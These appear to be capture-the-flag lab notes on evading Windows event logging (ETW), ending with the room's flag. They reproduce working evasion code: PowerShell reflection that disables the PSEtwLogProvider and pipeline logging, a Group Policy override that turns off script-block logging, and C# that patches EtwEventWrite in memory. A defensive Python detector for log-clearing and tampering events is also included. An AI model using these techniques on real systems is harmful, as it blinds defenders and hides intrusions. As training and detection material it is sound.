Event tracing
- SIEM (Security Information and Event Management): the central consumer of host event logs
- The primary target for an attacker is the event logs managed by ETW (Event Tracing for Windows)
- ETW handles logging at both the application and kernel levels
- Event IDs are the core feature of Windows logging
- Events are sent and transferred as XML (Extensible Markup Language)
- Events generated while carrying out an operation can disrupt the attacker's goals

Components
- Controllers: build and configure sessions
- Providers: generate events
- Consumers: interpret events
Windows event ID log list: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
Approaches to log evasion
- Log forwarding is typically employed
- Log forwarding: move logs from the host machine to a central server or indexer so they cannot be modified later
- Event IDs that record the clearing or stopping of logs:
  - 1102: logged when the Windows security audit log was cleared
  - 104: logged when the log file was cleared
  - 1100: logged when the Windows Event Log service was shut down
- The process of deleting logs therefore risks operational security
Tracing instrumentation
- Controllers define the size and location of the log file, start and stop event tracing sessions, enable providers, manage the size of the buffer pool, and obtain execution statistics
- Providers contain the event tracing instrumentation. There are four types of providers:
  - MOF (Managed Object Format): defines events from MOF classes. Enabled by one trace session at a time
  - WPP (Windows software trace preprocessor): associated with TMF (trace message format) files to decode information. Enabled by one trace session at a time
  - Manifest-based: defines events from a manifest. Enabled by up to eight trace sessions at a time
  - TraceLogging: self-describing events containing all required information. Enabled by up to eight trace sessions at a time
- Consumers are applications that select one or more event tracing sessions as a source of events. They can receive stored or real-time events
Techniques to target each ETW component
- Provider → PSEtwLogProvider modification, Group Policy takeover, log pipeline abuse, type creation
- Controller → patching EtwEventWrite, runtime tracing tampering
- Consumers → log smashing, log tampering
Inside a .NET assembly
- An assembly carries information about its contents (metadata)
- The .NET assembly of interest: PSEtwLogProvider
- Obtain the .NET type for PSEtwLogProvider:
  $logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
- Store the value of the static etwProvider field (read with a null instance, since the field is static):
  $etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
- Set the m_enabled field of the previously stored provider to 0:
  [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
- Compile into one .ps1 file, then run the other code
Patching the tracing function
- ETW is loaded from the runtime of every new process: the CLR (Common Language Runtime)
- Pre-defined opcodes can be written to an in-memory function to disable its functionality
- The stack is a LIFO (last in, first out) structure
- ETW events are written from the function EtwEventWrite
- The assembly instruction ret 14h ends the function and returns to the calling application
- Steps:
  - Obtain a handle for EtwEventWrite:
    var ntdll = Win32.LoadLibrary("ntdll.dll");
    var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
  - Modify the memory permissions of the function (flNewProtect = 0x40, PAGE_EXECUTE_READWRITE, enables execute, read and write):
    uint oldProtect;
    Win32.VirtualProtect(etwFunction, (UIntPtr)patch.Length, 0x40, out oldProtect);
  - Write the opcode bytes to memory with Marshal.Copy:
    var patch = new byte[] { 0xc2, 0x14, 0x00 };
    Marshal.Copy(patch, 0, etwFunction, patch.Length);
  - Reset the memory permissions of the function:
    VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
  - Flush the instruction cache:
    Win32.FlushInstructionCache(etwFunction, NULL);
Providers via policy
- Group Policy Objects enable the logging policies
- Script block logging (event ID 4104): exposes the attacker's scripts if they are not properly obfuscated
- Module logging (event ID 4103): logs any modules and the data sent from them; each session logs its own modules
- The goal of disabling these providers is to limit the visibility of the components required while making the environment appear untampered
Group Policy takeover
- Obtain the Group Policy settings from the utility cache via reflection into GroupPolicySettings
- Modify the generic provider setting to 0 (GPO variable set to 0):
  $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0  # 4103
- Compile together and append to the malicious PowerShell script
- Modify the invocation or module definition in the same way
Abusing the log pipeline
- Obtain the target module:
  $module = Get-Module Microsoft.PowerShell.Utility  # Get target module
- Set the module's execution details to false:
  $module.LogPipelineExecutionDetails = $false  # Set module execution details to false
- Obtain the module snap-in:
  $snap = Get-PSSnapin Microsoft.PowerShell.Core  # Get target PS snap-in
- Set the snap-in's execution details to false:
  $snap.LogPipelineExecutionDetails = $false  # Set PS snap-in execution details to false
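From the defender's side, the event IDs listed under log evasion (1102, 104, 1100) and the 4104 script blocks that expose un-obfuscated scripts are what a SIEM rule would key on. The following Python is an added example, not code from the original notes: it parses constructed, simplified Windows Event XML records and flags log-clearing events as well as script blocks that reference the ETW tampering techniques in this section; the hostname, record layout and marker list are constructed for the example.

```python
"""Added example (not from the notes): flag log-clearing event IDs and 4104
script blocks that reference the ETW providers/settings described above."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Event IDs from the notes that show a log was cleared or logging stopped
LOG_CLEAR_IDS = {1102: "Security audit log cleared", 104: "Event log file cleared",
                 1100: "Event Log service shut down"}

# Strings in a script block that point at the ETW tampering techniques above
ETW_TAMPER_MARKERS = ("PSEtwLogProvider", "EtwEventWrite",
                      "LogPipelineExecutionDetails", "EnableScriptBlockInvocationLogging")

def parse_event(xml_text):
    """Return (event_id, computer, script_block_text) for one event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    computer = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    script = ""
    for data in root.iterfind("e:EventData/e:Data", NS):
        if data.get("Name") == "ScriptBlockText":
            script = data.text or ""
    return event_id, computer, script

def detect(records):
    """Return (computer, event_id, reason) findings; benign records are skipped."""
    findings = []
    for rec in records:
        event_id, computer, script = parse_event(rec)
        if event_id in LOG_CLEAR_IDS:
            findings.append((computer, event_id, LOG_CLEAR_IDS[event_id]))
        elif event_id == 4104:  # script block logging: the provider that exposes scripts
            hits = [m for m in ETW_TAMPER_MARKERS if m.lower() in script.lower()]
            if hits:
                findings.append((computer, event_id, "ETW tampering: " + ", ".join(hits)))
    return findings

def record(event_id, computer, script=None):
    """Build one constructed, simplified event record (constructed hostname)."""
    data = f'<EventData><Data Name="ScriptBlockText">{script}</Data></EventData>' if script else ""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System>{data}</Event>')

# Constructed sample: a benign script block, a tampering script block, a cleared log
SAMPLE_RECORDS = [
    record(4104, "WS01", "Get-Module Microsoft.PowerShell.Utility"),
    record(4104, "WS01", "$module.LogPipelineExecutionDetails = $false"),
    record(1102, "WS01"),
]
```

Because a cleared log still leaves 1102/104/1100 behind and a forwarded copy of the script blocks survives on the indexer, the attacker's own steps above become the detection signal.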
Real world scenario
- Steps: run PowerShell with .\gpo-bypass.ps1, clear the logs from Event Viewer and disable logging, then run .\agent.exe
THM{51l3n7_l1k3_4_5n4k3}